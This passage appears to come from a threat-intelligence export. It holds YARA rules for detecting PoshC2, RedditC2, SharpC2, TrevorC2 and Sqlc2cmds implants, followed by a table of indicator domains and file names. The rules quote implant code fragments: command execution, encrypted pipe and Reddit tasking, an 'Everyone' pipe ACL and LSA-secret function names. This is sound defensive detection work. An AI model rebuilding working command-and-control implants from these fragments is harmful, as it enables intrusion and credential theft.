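        $s15 = " if ($ReadCommandClear -match (\"(.+)Base64\")) { $result = $Matches[0] } # $result doesn't app"
        $s18 = "function Decrypt-String($key, $encryptedStringWithIV) {" ascii fullword
        $s19 = "dData)), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd()" ascii fullword
        $s20 = " if (($ReadCommandClear) -and ($ReadCommandClear -ne \"fvdsghfdsyyh\")) {" ascii fullword

    condition:
        // Exact known sample; evaluated first, so every scanned file is hashed in full.
        hash.sha256(0, filesize) == "6d520463f8563d6a296d22b6824c690c9b6de8121c9b6f08307947874667c5f2"
        or (
            uint16(0) == 0x6b24     // file starts with "$k" (little-endian), e.g. "$key"
            and filesize < 40KB
            and 1 of ($x*)          // with a single $x this simply requires $x1
            and 4 of them           // $x1 plus three $s
        )
}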
|
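import "hash"

// PoshC2 - pbind.ps1 (named-pipe bind implant for SMB/pivot use).
// The most hunt-worthy artefact is $s11/$s12/$s7: a NamedPipeServerStream whose
// PipeSecurity grants 'Everyone' ReadWrite. That ACL is unusual for legitimate
// software and can also be hunted outside YARA (pipe creation telemetry).
// $s9 carries the unrendered #REPLACE...# placeholders and only matches the
// PoshC2 source template, not a generated pbind.
rule PoshC2_PbindPs1
{
    meta:
        description = "PoshC2 - pbind.ps1"
        sha256 = "696e2d58b3a3d21ef422fc5103c4cc1a601f359ee1721eb9ecb099be95f229a7"

    strings:
        // The original rule had $s1 twice ($s1/$s2) and $s10 twice ($s10/$s13);
        // the duplicates were removed so a hit cannot count twice toward "8 of them".
        $s1 = " $decCommand = Decrypt-String -key $key -encryptedStringWithIV $command" ascii fullword
        $s3 = " $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16)" ascii fullword
        $s4 = " $encCommand2 = Encrypt-String -unencryptedString $res -Key $key" ascii fullword
        $s5 = " $encCommand = Encrypt-String -unencryptedString 'COMMAND' -Key $key" ascii fullword
        $s6 = " $encbad = Encrypt-String -unencryptedString 'This should never fire! - crypto failure' -Key $key" ascii fullword
        $s7 = "$Pipe = New-Object System.IO.Pipes.NamedPipeServerStream($pname,'InOut',100, 'Byte', 'None', 4096, 4096, $PipeSecurity)" ascii fullword
        $s8 = " if ($decCommand -eq 'KILLPIPE'){exit}" ascii fullword
        $s9 = "invoke-pserv -secret #REPLACEPBINDSECRET# -key #REPLACEKEY# -pname #REPLACEPBINDPIPENAME#" ascii fullword
        $s10 = " $command = $pipeReader.ReadLine()" ascii fullword
        $s11 = "$PipeSecurity = New-Object System.IO.Pipes.PipeSecurity" ascii fullword
        $s12 = "$AccessRule = New-Object System.IO.Pipes.PipeAccessRule( 'Everyone', 'ReadWrite', 'Allow' )" ascii fullword
        $s14 = " $bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString)" ascii fullword
        $s15 = " $fileContentBytes = [System.Text.Encoding]::Unicode.GetBytes($res)" ascii fullword
        $s16 = " [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0)" ascii fullword
        $s17 = " {$aesManaged.Key = [System.Convert]::FromBase64String($key)}" ascii fullword
        $s18 = " $bytes = [System.Convert]::FromBase64String($encryptedStringWithIV)" ascii fullword
        $s19 = " if ($decCommand -eq 'EXIT') { break }" ascii fullword
        $s20 = " $encSure = Encrypt-String -unencryptedString 'SURE' -Key $key" ascii fullword

    condition:
        // Exact known sample; evaluated first, so every scanned file is hashed in full.
        hash.sha256(0, filesize) == "696e2d58b3a3d21ef422fc5103c4cc1a601f359ee1721eb9ecb099be95f229a7"
        or (
            uint16(0) == 0x7566     // file starts with "fu" (little-endian), e.g. "function"
            and filesize < 10KB
            and 8 of them
        )
}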
|
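import "hash"

// PoshC2 - base64-encoded Sharp_v2/v4 x86/x64 DLL and shellcode blobs.
// WARNING - low-fidelity strings. Every $s string is a base64 fragment of long
// zero runs ("AAAA..." / "QUFB..." = base64 of 0x00/"AAA" padding) or of a few
// header bytes. Any base64-encoded PE or zero-padded blob contains these, so the
// string part of this rule is not specific to PoshC2. Only the SHA-256 clauses
// identify PoshC2; treat a string-only hit as "base64-encoded binary found" and
// decode/triage it rather than alerting on it as PoshC2.
rule PoshC2_Shellcode
{
    meta:
        description = "PoshC2 - Sharp_v2_x64_dll.b64, Sharp_v2_x64_Shellcode.b64, Sharp_v2_x86_dll.b64, Sharp_v2_x86_Shellcode.b64, Sharp_v4_x64_dll.b64, Sharp_v4_x64_Shellcode.b64, Sharp_v4_x86_dll.b64, Sharp_v4_x86_Shellcode.b64"
        sha256_1 = "dd654eb75c1f3736d4b5282e7338a5efcbd7481fc7b46ec38a3ff0ea573c408e"
        sha256_2 = "cb96cca9101899754efc33859353e0834496a98ee4381b1a9158c7403e1562d2"
        sha256_3 = "03c10e261a138666a1c5cf9cb577e8d73e041b1dae0a3d1198d116e4c2b5dec3"
        sha256_4 = "04ced8976f86801a23ee5fa1fb33f7cab5638039fb6d2a441a169784ce37adf9"
        sha256_5 = "ce950ee11e27e0a95840fa12c878af19910aa82d1ccd5eb99ab99c4131571989"
        sha256_6 = "fc454c2453d9cf6b64c0e6ffab76e6f26c584698a454c7cf2e07d96b11a29fb6"
        sha256_7 = "ddc5047d6a8bb245644c5385ead8fa0d3b751f2aabf9e88e423e0b9862e65019"
        sha256_8 = "f83bbf7318f982ddb457863cf2b45e13c402c2eff5bb1a4d5b8f074295ff46f9"

    strings:
        $s1 = "QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"
        $s2 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
        $s3 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
        $s4 = "ACAAAAAAAAA"
        $s5 = "ABAAAAAAAAA"
        $s6 = "AAAADAAAAA"
        $s7 = "EAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
        $s8 = "AAAABAAAAA"
        $s9 = "AbAAAAAAAc"
        $s10 = "AAAACAAAAA"
        $s11 = "AAAAAAAAAAAAAAAAAAA"   // 19 x 'A': a substring of $s2/$s3, so it matches whenever they do

    condition:
        hash.sha256(0, filesize) == "dd654eb75c1f3736d4b5282e7338a5efcbd7481fc7b46ec38a3ff0ea573c408e"
        or hash.sha256(0, filesize) == "cb96cca9101899754efc33859353e0834496a98ee4381b1a9158c7403e1562d2"
        or hash.sha256(0, filesize) == "03c10e261a138666a1c5cf9cb577e8d73e041b1dae0a3d1198d116e4c2b5dec3"
        or hash.sha256(0, filesize) == "04ced8976f86801a23ee5fa1fb33f7cab5638039fb6d2a441a169784ce37adf9"
        or hash.sha256(0, filesize) == "ce950ee11e27e0a95840fa12c878af19910aa82d1ccd5eb99ab99c4131571989"
        or hash.sha256(0, filesize) == "fc454c2453d9cf6b64c0e6ffab76e6f26c584698a454c7cf2e07d96b11a29fb6"
        or hash.sha256(0, filesize) == "ddc5047d6a8bb245644c5385ead8fa0d3b751f2aabf9e88e423e0b9862e65019"
        or hash.sha256(0, filesize) == "f83bbf7318f982ddb457863cf2b45e13c402c2eff5bb1a4d5b8f074295ff46f9"
        or (
            // "TV" = start of base64("MZ..."), "6A" = start of base64 of an 0xE8 (call) byte.
            (uint16(0) == 0x5654 or uint16(0) == 0x4136)
            and filesize < 600KB
            and 8 of them
        )
        // The original rule had a further "or (all of them)" branch with no
        // header or size gate. Because the strings are generic base64 padding,
        // that branch fired on any base64-encoded PE of any size; it was removed.
}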
|
Details | Yara rule | 1 | import "hash" rule RedditC2_ImplantUNIX { meta: description = "RedditC2 - implant.py" sha256 = "dba80b543f6d39f2d0631f6cfebef961259746e6f70fb0cf1431e85343ba7d32" strings: $s1 = " listener_session = subprocess.getoutput('hostname')" ascii fullword $s2 = " if(\"in:\" in top_level_comment.body and top_level_comment.id not in self.processed_comments):" ascii fullword $s3 = " i = Implant(client_id, client_secret, username, password, subreddit, listener_session, user_agent, xor_key)" ascii fullword $s4 = " output = subprocess.getoutput(command)" ascii fullword $s5 = " def __init__(self, client_id, client_secret, username, password, subreddit_name, listener_name, user_agent, xor_key):" ascii fullword $s6 = "def runTask(command):" ascii fullword $s7 = " ciphertext = \"powershell.exe \" + ciphertext[11:]" ascii fullword $s8 = "def decrypt(encoded_text, key):" ascii fullword $s9 = " self.processed_comments.append(top_level_comment.id)" ascii fullword $s10 = " print(\"[+] Received task to execute: \" + ciphertext)" ascii fullword $s11 = " self.processed_comments = []" ascii fullword $s12 = " if(command[:8] == \"download\"):" ascii fullword $s13 = " user_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/" $s14 = "def encrypt(plaintext, key):" ascii fullword $s15 = "def xor_encrypt(plaintext, key):" ascii fullword $s16 = " user_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/" $s17 = " new_comment_body = comment_body.replace('in', 'executed')" ascii fullword $s18 = " self.subreddit.submit(self.listener_name, selftext=postContent)" ascii fullword $s19 = "def base64_decode(encoded_text):" ascii fullword $s20 = " output = runTask(command)" ascii fullword condition: hash.sha256(0, filesize) == "dba80b543f6d39f2d0631f6cfebef961259746e6f70fb0cf1431e85343ba7d32" or uint16(0) == 0x6d69 and filesize < 20KB and 8 of them } |
|
Details | Yara rule | 1 | import "hash" rule RedditC2_ImplaintWin { meta: description = "RedditC2 - RedditAgent.exe" sha256 = "8b534d0f9f699d6a02aca559f2699d914b0b3f8749e0d206bece0fe09b92ccc6" strings: $s1 = "RedditAgent.exe" wide fullword $s2 = "set_UseShellExecute" ascii fullword $s3 = "[+] Created agent session: " wide fullword $s4 = "run hostname" wide fullword $s5 = "powershell" wide fullword $s6 = "myPassword" wide fullword $s7 = "myxorkey" wide fullword $s8 = ".NETFramework,Version=v4.7.2" ascii fullword $s9 = ".NET Framework 4.7.2" ascii fullword $s10 = "E:\\Work\\Analysis\\" ascii fullword $s11 = "[+] File uploaded successfully" wide fullword $s12 = "createPost" ascii fullword $s13 = "encryptedMessage" ascii fullword $s14 = "RedditAgent" wide fullword $s15 = "SubmitTextPost" ascii fullword $s16 = "GetSubreddit" ascii fullword $s17 = "postText" ascii fullword $s18 = "xorkey" ascii fullword $s19 = "listenerID" ascii fullword $s20 = "RedditSharp.Things" ascii fullword condition: hash.sha256(0, filesize) == "8b534d0f9f699d6a02aca559f2699d914b0b3f8749e0d206bece0fe09b92ccc6" or uint16(0) == 0x5a4d and filesize < 20KB and 8 of them } |
|
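import "pe"
import "hash"

// SharpC2 - SharpC2.exe.
// What this file is: a .NET (Core) "apphost" launcher stub. Every string except
// $s4 ("SharpC2.dll") is stock apphost text - including $s5, which is
// Microsoft's own apphost.pdb build path - and is present in every apphost.exe
// shipped with a .NET Core application. The import checks are equally generic.
// Without requiring $s4 the rule fired on essentially any .NET Core launcher,
// so $s4 is now mandatory in the heuristic branch.
// Scope caveat: the SharpC2.dll it launches (see the sibling SharpC2Dll rule)
// is the Blazor/WinUI *client*; a hit most likely indicates an operator
// workstation or tooling cache, not an implanted victim.
rule SharpC2Exe
{
    meta:
        description = "SharpC2 - SharpC2.exe"
        sha256 = "162fc5cdd4ed03ab16da5edd076bc05e87dae1a41b053dddbcc8cac06baa8a63"

    strings:
        $s1 = "hostfxr.dll" wide fullword
        $s2 = "--- Invoked %s [version: %s, commit hash: %s] main = {" wide fullword
        $s3 = "This executable is not bound to a managed DLL to execute. The binding value is: '%s'" wide fullword
        $s4 = "SharpC2.dll" wide fullword   // the only SharpC2-specific string
        $s5 = "D:\\a\\_work\\1\\s\\artifacts\\obj\\win-x64.Release\\corehost\\apphost\\standalone\\apphost.pdb" ascii fullword
        $s6 = "The managed DLL bound to this executable is: '%s'" wide fullword
        $s7 = "A fatal error was encountered. This executable was not bound to load a managed DLL." wide fullword
        $s8 = "Showing error dialog for application: '%s' - error code: 0x%x - url: '%s' - dialog message: %s" wide fullword
        $s9 = "Failed to resolve full path of the current executable [%s]" wide fullword
        $s10 = "https://go.microsoft.com/fwlink/?linkid=798306" wide fullword
        $s11 = "The managed DLL bound to this executable could not be retrieved from the executable image." wide fullword
        $s12 = "Could not load 'kernel32.dll': %u" wide fullword
        $s13 = "Download the .NET runtime:" wide fullword
        $s14 = "IsWow64Process2" ascii fullword
        $s15 = " - Installing .NET prerequisites might help resolve this problem." wide fullword
        $s16 = " - https://aka.ms/dotnet-core-applaunch?" wide fullword
        $s17 = "Bundle header version compatibility check failed." wide fullword
        $s18 = "Failed to load the dll from [%s], HRESULT: 0x%X" wide fullword
        $s19 = "The required library %s does not support relative app dll paths." wide fullword
        $s20 = "Call to IsWow64Process2 failed: %u" wide fullword

    condition:
        // Exact known sample; evaluated first, so every scanned file is hashed in full.
        hash.sha256(0, filesize) == "162fc5cdd4ed03ab16da5edd076bc05e87dae1a41b053dddbcc8cac06baa8a63"
        or (
            uint16(0) == 0x5a4d     // "MZ"
            and filesize < 500KB
            and pe.sections[4].name == "_RDATA"   // undefined (false) on a PE with fewer than five sections
            and pe.imports("kernel32.dll", "TerminateProcess")
            and pe.imports("shell32.dll", "ShellExecuteW")
            and pe.imports("kernel32.dll", "IsDebuggerPresent")
            and pe.imports("kernel32.dll", "FindFirstFileExW")
            and $s4                 // must name SharpC2.dll, otherwise this is just "a .NET apphost"
            and 8 of them
        )
}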
|
import "hash"

// SharpC2 - SharpC2.dll.
// Scope caveat: the strings here ($s2-$s7, $s9-$s11, $s14-$s20) are Blazor
// component and SharpC2Api client types, $s8 is a Client\...\net7.0-windows
// PDB path and $s13 references Microsoft.ui.xaml.dll. That is the operator
// *client* application, not the implant ("drone") that runs on victims. A hit
// indicates SharpC2 operator tooling on the scanned host.
// $s12 "SHELLCODE" and $s21 "MemoryStream" are generic on their own.
rule SharpC2Dll
{
    meta:
        description = "SharpC2 - SharpC2.dll"
        sha256 = "ce0fe31e5c1fe918f766ab2e83daaac9e58cce3972c0872f8d1b2de03417528f"

    strings:
        $s1 = "SharpC2.dll" wide fullword
        $s2 = "RClient.Components.Pivots.ReversePortForwardTable+<OnReversePortForwardCreated>d__7" ascii fullword
        $s3 = "AClient.Components.Pivots.ReversePortForwardTable+<AddForward>d__5" ascii fullword
        $s4 = "RClient.Components.Pivots.ReversePortForwardTable+<OnReversePortForwardDeleted>d__6" ascii fullword
        $s5 = "DClient.Components.Pivots.ReversePortForwardTable+<DeleteForward>d__9" ascii fullword
        $s6 = "HClient.Components.Pivots.ReversePortForwardTable+<OpenCreateForward>d__8" ascii fullword
        $s7 = "__Blazor.Client.Components.Tasks.ProcessListing" ascii fullword
        $s8 = "C:\\Tools\\SharpC2\\Client\\obj\\Release\\net7.0-windows10.0.19041.0\\win10-x64\\SharpC2.pdb" ascii fullword
        $s9 = "IClient.Components.Pivots.ReversePortForwardTable+<OnInitializedAsync>d__4" ascii fullword
        $s10 = "KClient.Components.Pivots.CreateReversePortForward+<OnInitializedAsync>d__12" ascii fullword
        $s11 = "7Client.Components.Handlers.HostAFile+<UploadFiles>d__22" ascii fullword
        $s12 = "SHELLCODE" wide fullword
        $s13 = "Microsoft.ui.xaml.dll" ascii fullword
        $s14 = "0Client.Services.SharpC2Api+<GetHostedFiles>d__26" ascii fullword
        $s15 = "8Client.Services.SharpC2Api+<GetReversePortForwards>d__42" ascii fullword
        $s16 = "7Client.Services.SharpC2Api+<GetReversePortForward>d__43" ascii fullword
        $s17 = "__Blazor.Client.Components.Pivots.CreateReversePortForward" ascii fullword
        $s18 = ";Client.Components.Handlers.HttpHandlers+<OpenHostFile>d__10" ascii fullword
        $s19 = "9Client.Components.Events.WebLogs+<OnInitializedAsync>d__3" ascii fullword
        $s20 = "__Blazor.Client.Components.Pivots.ReversePortForwardTable" ascii fullword
        $s21 = "MemoryStream" ascii fullword

    condition:
        // Exact known sample; evaluated first, so every scanned file is hashed in full.
        hash.sha256(0, filesize) == "ce0fe31e5c1fe918f766ab2e83daaac9e58cce3972c0872f8d1b2de03417528f"
        or uint16(0) == 0x5a4d   // "MZ"
        and filesize < 2000KB
        and 8 of them
}
|
Details | Yara rule | 1 | import "hash" rule SharpC2_API { meta: description = "SharpC2 - SharpC2.API.dll" sha256 = "720ded9560168b206152cceab0fcfa8138ad92311a0cf4b5bdf7ba0bd8074839" strings: $s1 = "SharpC2.API.dll" wide fullword $s2 = "C:\\Tools\\SharpC2\\SharpC2.API\\obj\\Release\\netstandard2.0\\SharpC2.API.pdb" ascii fullword $s3 = "get_PayloadType" ascii fullword $s4 = "get_ForwardPort" ascii fullword $s5 = "Payloads" ascii fullword $s6 = "get_BindPort" ascii fullword $s7 = "get_ForwardHost" ascii fullword $s8 = "<PayloadType>k__BackingField" ascii fullword $s9 = "set_PayloadType" ascii fullword $s10 = "/api/v1/payloads" wide fullword $s11 = "ReversePortForwardRequest" ascii fullword $s12 = "<ForwardPort>k__BackingField" ascii fullword $s13 = "get_ConnectAddress" ascii fullword $s14 = "ReversePortForwardResponse" ascii fullword $s15 = "get_ConnectPort" ascii fullword $s16 = "get_SourceAddress" ascii fullword $s17 = "set_ForwardPort" ascii fullword $s18 = "set_PipeName" ascii fullword $s19 = "SharpC2.API.Requests" ascii fullword $s20 = "SharpC2.API.Responses" ascii fullword condition: hash.sha256(0, filesize) == "720ded9560168b206152cceab0fcfa8138ad92311a0cf4b5bdf7ba0bd8074839" or uint16(0) == 0x5a4d and filesize < 100KB and 8 of them } |
|
Details | Yara rule | 1 | import "pe" import "hash" rule TrevorC2_Win { meta: description = "TrevorC2 - tc2_client.exe" sha256 = "11d05c91663798116f6426c24166bdd648c519f6f95bdff4659dd56c575e7978" strings: $s1 = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.37 E" $s2 = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.37 E" $s3 = " VirtualQuery failed for %d bytes at address %p" ascii fullword $s4 = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p." ascii fullword $s5 = "magic_hostname=%s" ascii fullword $s6 = "Tr3v0rC2R0x@nd1s@w350m3#TrevorForget" ascii fullword $s7 = "%s?%s%s" ascii fullword $s8 = "<!-- oldcss=" ascii fullword $s9 = "killnow" ascii fullword $s10 = "sessionid=" ascii fullword $s11 = " VirtualProtect failed with code 0x%x" ascii fullword $s12 = "Cookie: sessionid=%s" ascii fullword $s13 = " Unknown pseudo relocation protocol version %d." ascii fullword $s14 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" $s15 = "192.168.1.175" ascii fullword $s16 = "connect" ascii fullword $s17 = "socket" ascii fullword $s18 = ":MZuYHcB<H" ascii fullword $s19 = "=UUUUw" ascii fullword $s20 = "ATUWVSHcY" ascii fullword condition: hash.sha256(0, filesize) == "11d05c91663798116f6426c24166bdd648c519f6f95bdff4659dd56c575e7978" or pe.imports("ws2_32.dll", "send") and pe.imports("kernel32.dll", "VirtualProtect") and pe.imports("msvcrt.dll", "rand") and pe.imports("kernel32.dll", "VirtualQuery") and uint16(0) == 0x5a4d and filesize < 200KB and 8 of them } |
|
Details | Yara rule | 1 | import "hash" rule TrevorC2_UNIX { meta: description = "TrevorC2 - tc2_client.out" sha256 = "39391bffd11e6e525b02ea4cd5b3b4422c072126424b7031db346d260a4bd127" strings: $s1 = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.37 E" $s2 = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.37 E" $s3 = "magic_hostname=%s" ascii fullword $s4 = "Tr3v0rC2R0x@nd1s@w350m3#TrevorForget" ascii fullword $s5 = "%s?%s%s" ascii fullword $s6 = "<!-- oldcss=" ascii fullword $s7 = "killnow" ascii fullword $s8 = "sessionid=" ascii fullword $s9 = "Cookie: sessionid=%s" ascii fullword $s10 = ".note.gnu.build-id" ascii fullword $s11 = ".note.gnu.property" ascii fullword $s12 = ".note.ABI-tag" ascii fullword $s13 = ".eh_frame_hdr" ascii fullword $s14 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" $s15 = "192.168.1.175" ascii fullword $s16 = "connect" ascii fullword $s17 = "socket" ascii fullword $s18 = "Accept: text/html" ascii fullword $s19 = "_ITM_deregisterTMCloneTable" ascii fullword $s20 = "libc.so.6" ascii fullword condition: hash.sha256(0, filesize) == "39391bffd11e6e525b02ea4cd5b3b4422c072126424b7031db346d260a4bd127" or uint16(0) == 0x457f and filesize < 80KB and 8 of them } |
|
Details | Yara rule | 1 | import "pe" import "hash" rule Sqlc2cmds { meta: description = "Sqlc2cmds - sqlc2cmds.dll" sha256 = "019fa586cbbdc875e72e614ab1917a93bcbc14bb0fa1731d0643b93c3763db2a" strings: $x1 = "C:\\Windows\\System32\\cmd.exe" wide fullword $s2 = "sqlc2cmds.dll" wide fullword $s3 = "WMI command executed" wide fullword $s4 = "\\\\127.0.0.1\\root\\cimv2:Win32_Process" wide fullword $s5 = "base64EncodedPayload" ascii fullword $s6 = "run_shellcode" ascii fullword $s7 = "run_command" ascii fullword $s8 = "run_command_ps" ascii fullword $s9 = "run_command_wmi" ascii fullword $s10 = "run_getusercon" ascii fullword $s11 = "send_http_get" ascii fullword $s12 = "execTsql" ascii fullword $s13 = "get_lsa_secrets" ascii fullword $s14 = "send_http_post" ascii fullword $s15 = "run_getprocs" ascii fullword $s16 = "entriesread" ascii fullword $s17 = "read_file_bin" ascii fullword $s18 = "fileContent" ascii fullword $s19 = "OriginatingHost" ascii fullword $s20 = "PostRequest" ascii fullword condition: hash.sha256(0, filesize) == "019fa586cbbdc875e72e614ab1917a93bcbc14bb0fa1731d0643b93c3763db2a" or uint16(0) == 0x5a4d and filesize < 40KB and 1 of ($x*) and 4 of them } |
|
Details | Domain | 2 | new.target |
|
Details | Domain | 2 | comp.id |
|
Details | Domain | 339 | system.net |
|
Details | Domain | 64 | go.microsoft.com |
|
Details | Domain | 107 | aka.ms |
|
Details | Domain | 32 | graph.microsoft.com |
|
Details | Domain | 14 | content.dropboxapi.com |
|
Details | Domain | 6 | api.dropboxapi.com |
|
Details | Domain | 1 | bytes34694469519536141888238489627838134765625mapiter.next |
|
Details | Domain | 73 | schemas.microsoft.com |
|
Details | Domain | 150 | www.w3.org |
|
Details | Domain | 32 | schemas.xmlsoap.org |
|
Details | Domain | 105 | domain.com |
|
Details | Domain | 1 | kali.host |
|
Details | Domain | 4 | myapplication.app |
|
Details | Domain | 67 | microsoft.windows |
|
Details | Domain | 1 | agent.so |
|
Details | Domain | 9 | sam.save |
|
Details | Domain | 7 | security.save |
|
Details | Domain | 1 | stage2core.so |
|
Details | Domain | 107 | system.management |
|
Details | Domain | 2 | dropper.py |
|
Details | Domain | 8 | response.read |
|
Details | Domain | 1 | res.read |
|
Details | Domain | 1 | implant-core.py |
|
Details | Domain | 291 | raw.githubusercontent.com |
|
Details | Domain | 6 | keylogger.py |
|
Details | Domain | 4127 | github.com |
|
Details | Domain | 1 | this.pid |
|
Details | Domain | 228 | system.io |
|
Details | Domain | 3 | implant.py |
|
Details | Domain | 1 | 0client.services |
|
Details | Domain | 1 | 8client.services |
|
Details | Domain | 1 | 7client.services |
|
Details | Domain | 1 | 9client.components.events |
|
Details | Domain | 10 | note.gnu.build |
|
Details | Domain | 1 | note.gnu.property |
|
Details | Domain | 145 | libc.so |
|
Details | Domain | 1 | howto.thec2matrix.com |
|
Details | Domain | 360 | attack.mitre.org |
|
Details | File | 1 | airstrike-x64.exe |
|
Details | File | 1 | airstrike-x86.exe |
|
Details | File | 748 | kernel32.dll |
|
Details | File | 83 | crypt32.dll |
|
Details | File | 146 | wininet.dll |
|
Details | File | 1 | wqjs_x64.exe |
|
Details | File | 1 | wqjs_x86.exe |
|
Details | File | 2 | new.tar |
|
Details | File | 39 | amsi.dll |
|
Details | File | 8 | b.dat |
|
Details | File | 1 | popcalc.bin |
|
Details | File | 312 | calc.exe |
|
Details | File | 13 | client.dll |
|
Details | File | 2125 | cmd.exe |
|
Details | File | 1 | implant.exe |
|
Details | File | 2 | tasks.exe |
|
Details | File | 6 | pe.exe |
|
Details | File | 69 | client.exe |
|
Details | File | 2 | hostfxr.dll |
|
Details | File | 1 | badger_x64.dll |
|
Details | File | 1 | hk2pvh1a.dll |
|
Details | File | 1 | c3oqgc2d.dll |
|
Details | File | 12 | pe.dll |
|
Details | File | 1 | badger_x64_rtlexituserthread.bin |
|
Details | File | 1 | badger_x64_service.exe |
|
Details | File | 229 | advapi32.dll |
|
Details | File | 1 | badger_x64_stealth_rtlexituserthread.bin |
|
Details | File | 1 | badger_x64_stealth_service.exe |
|
Details | File | 1 | badger_x64_stealth_waitforsingleobject.bin |
|
Details | File | 1 | badger_x64_waitforsingleobject.bin |
|
Details | File | 1 | s-.rb |
|
Details | File | 1 | badger_x86.dll |
|
Details | File | 1 | f5m5inbs.dll |
|
Details | File | 1 | badger_x86_rtlexituserthread.bin |
|
Details | File | 1 | badger_x86_service.exe |
|
Details | File | 1 | badger_x86_waitforsingleobject.bin |
|
Details | File | 1 | syscall_stage_x64_rtlexituserthread.bin |
|
Details | File | 1 | syscall_stage_x64_waitforsingleobject.bin |
|
Details | File | 1 | syscall_stage_x86_rtlexituserthread.bin |
|
Details | File | 1 | syscall_stage_x86_waitforsingleobject.bin |
|
Details | File | 1 | noderelaydll_r64.dll |
|
Details | File | 1 | noderelaydll_r86.dll |
|
Details | File | 3 | api-ms-win-core-synch-l1-2-0.dll |
|
Details | File | 34 | winhttp.dll |
|
Details | File | 1 | onenotec2client.exe |
|
Details | File | 1 | outlookc2client.exe |
|
Details | File | 1 | onenotec2client.dll |
|
Details | File | 1 | outlookc2client.dll |
|
Details | File | 9 | system.config |
|
Details | File | 2 | uration.config |
|
Details | File | 1 | dbc2loader.dll |
|
Details | File | 1 | dbc2_agent.exe |
|
Details | File | 1 | lsadump.exe |
|
Details | File | 5 | minidump.exe |
|
Details | File | 5 | ntdsdump.exe |
|
Details | File | 1 | samdump.exe |
|
Details | File | 1 | screengrab.exe |
|
Details | File | 1 | attributerpc.reg |
|
Details | File | 26 | os.exe |
|
Details | File | 1 | rof.dll |
|
Details | File | 1 | i32.dll |
|
Details | File | 2 | zoneinfo.zip |
|
Details | File | 1 | agent_x64.exe |
|
Details | File | 1 | agent_x86.exe |
|
Details | File | 1 | exchanger_x64.exe |
|
Details | File | 1 | exchanger_x86.exe |
|
Details | File | 31 | schemas.xml |
|
Details | File | 2 | dllhijack.dll |
|
Details | File | 1 | mikedrop.exe |
|
Details | File | 1 | mikec2.exe |
|
Details | File | 2 | agent.dll |
|
Details | File | 2 | drawing.dll |
|
Details | File | 57 | system.dll |
|
Details | File | 130 | ws2_32.dll |
|
Details | File | 1 | northstarstager.exe |
|
Details | File | 165 | reg.exe |
|
Details | File | 1 | systemhealthcheck.exe |
|
Details | File | 1 | _samdump.zip |
|
Details | File | 207 | login.php |
|
Details | File | 1 | getjuice.php |
|
Details | File | 1 | petaqimplant.exe |
|
Details | File | 58 | test.exe |
|
Details | File | 20 | shellcode.bin |
|
Details | File | 1 | c:\windows\temp\1.txt |
|
Details | File | 4 | powershell.ps1 |
|
Details | File | 1208 | powershell.exe |
|
Details | File | 59 | csc.exe |
|
Details | File | 1 | dynamiccode.exe |
|
Details | File | 1 | fcomm.exe |
|
Details | File | 1 | pbind.exe |
|
Details | File | 1 | sharp_powershell_runner.exe |
|
Details | File | 15 | dropper.exe |
|
Details | File | 1 | dotnet2js.js |
|
Details | File | 3 | dropper.ps1 |
|
Details | File | 46 | automation.ps |
|
Details | File | 5 | a.key |
|
Details | File | 7 | dropper.py |
|
Details | File | 14 | urllib2.url |
|
Details | File | 1 | implant-core.py |
|
Details | File | 5 | keylogger.py |
|
Details | File | 1 | implant-core.js |
|
Details | File | 3 | shell.js |
|
Details | File | 1 | apfell-jxa.js |
|
Details | File | 2 | http.js |
|
Details | File | 364 | console.log |
|
Details | File | 1 | operatingsystemversionstring.js |
|
Details | File | 1 | implant-core.ps1 |
|
Details | File | 1 | pbind.ps1 |
|
Details | File | 1 | aesmanaged.key |
|
Details | File | 2 | implant.py |
|
Details | File | 1 | redditagent.exe |
|
Details | File | 1 | sharpc2.exe |
|
Details | File | 1 | sharpc2.dll |
|
Details | File | 13 | kernel32.dll |
|
Details | File | 185 | shell32.dll |
|
Details | File | 5 | xaml.dll |
|
Details | File | 2 | api.dll |
|
Details | File | 1 | tc2_client.exe |
|
Details | File | 80 | msvcrt.dll |
|
Details | File | 1 | sqlc2cmds.dll |
|
Details | File | 48 | c:\windows\system32\cmd.exe |
|
Details | Github username | 18 | empireproject |
|
